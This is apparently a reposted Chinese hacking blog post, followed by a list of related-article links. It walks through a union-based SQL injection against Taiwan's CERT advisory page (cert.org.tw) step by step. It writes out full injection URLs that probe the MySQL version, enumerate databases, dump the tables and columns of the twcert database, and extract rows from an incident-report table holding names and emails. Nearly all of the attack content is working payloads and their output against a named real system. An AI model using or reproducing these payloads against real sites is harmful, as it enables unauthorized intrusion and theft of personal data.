大牛教你查庫暴庫
http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,說明大於4.0版本,支援ounion查詢
2.猜解欄位數目,用order by也可以猜,也可以用union select一個一個的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9–
3.檢視資料庫版本及當前使用者,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9–
資料庫版本5.1.35,據說mysql4.1以上版本支援concat函式,我也不知道是真是假,有待牛人去考證。
4.判斷有沒有寫許可權
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0– 返回錯誤,沒有寫許可權
沒辦法,手動猜表啦
5.查庫,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是這個點有點不爭氣,用不了這個命令,就學習了下土耳其黑客的手法,不多說,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns–
成功查出所有資料庫,國外的黑客就是不一般。資料庫如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert庫
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274–
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,這次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973–
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查詢欄位數,到這一步,國內很少有黑客去查詢欄位數的,直接用limit N,1去查詢,直接N到報錯為止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys–
返回是3,說明每個列裡有3個地段。
9.爆欄位內容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1–
爆出name列的第一個欄位的內容。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1–
爆出name列的第二個欄位的內容。
本文轉hackfreer51CTO部落格,原文連結:http://blog.51cto.com/pnig0s1992/489519,如需轉載請自行聯絡原作者
相關文章
- 教你用一條SQL搞定跨資料庫查詢難題SQL資料庫
- 教你玩轉Git-建立倉庫Git
- Java實戰:教你如何進行資料庫分庫分表Java資料庫
- Jemter查詢資料庫資料庫
- 求助:資料庫查詢資料庫
- ThinkPHP 資料庫查詢PHP資料庫
- 資料庫排序查詢資料庫排序
- 查詢資料庫大小資料庫
- 手把手教你快速搭建React元件庫React元件
- 教你資料庫漏洞防護技術資料庫
- 教你七步優化資料庫優化資料庫
- 資料庫高階查詢之子查詢資料庫
- 資料庫查詢優化資料庫優化
- 資料庫查詢語句資料庫
- 手把手教你搭建Docker私有倉庫HarborDocker
- 教你如何用php pdo連線資料庫PHP資料庫
- 教你玩轉Git-提取遠端倉庫Git
- 手把手教你配置git和git倉庫Git
- 手把手教你搭建自己的Angular元件庫Angular元件
- 教你如何用python運算元據庫mysql!!PythonMySql
- python資料庫-MySQL資料庫高階查詢操作(51)Python資料庫MySql
- 資料庫基礎查詢--單表查詢資料庫
- 資料庫查詢語言(DQL)資料庫
- openguass 資料庫狀態查詢資料庫
- SQLServer查詢所有資料庫大小SQLServer資料庫
- 資料庫中單表查詢資料庫
- SQL Server 跨資料庫查詢SQLServer資料庫
- 【資料庫】MySQL查詢優化資料庫MySql優化
- 資料庫查詢慢的原因資料庫
- 手把手教你搭建Raneto知識庫框架(一)框架
- 教你玩轉Git-刪除遠端倉庫Git
- 教你如何使用flask實現ajax資料入庫Flask
- MongoDB資料庫手把手教你來學習MongoDB資料庫
- 手把手教你搭建自己的Angular元件庫 - DevUIAngular元件devUI
- 20240719資料庫關聯查詢、條件查詢資料庫
- MySQL資料庫基礎——多表查詢:子查詢MySql資料庫
- 【YashanDB資料庫】yasboot查詢資料庫狀態時顯示資料庫狀態為off資料庫boot
- Oracle資料庫的查詢變慢了Oracle資料庫
- 上億級別資料庫查詢資料庫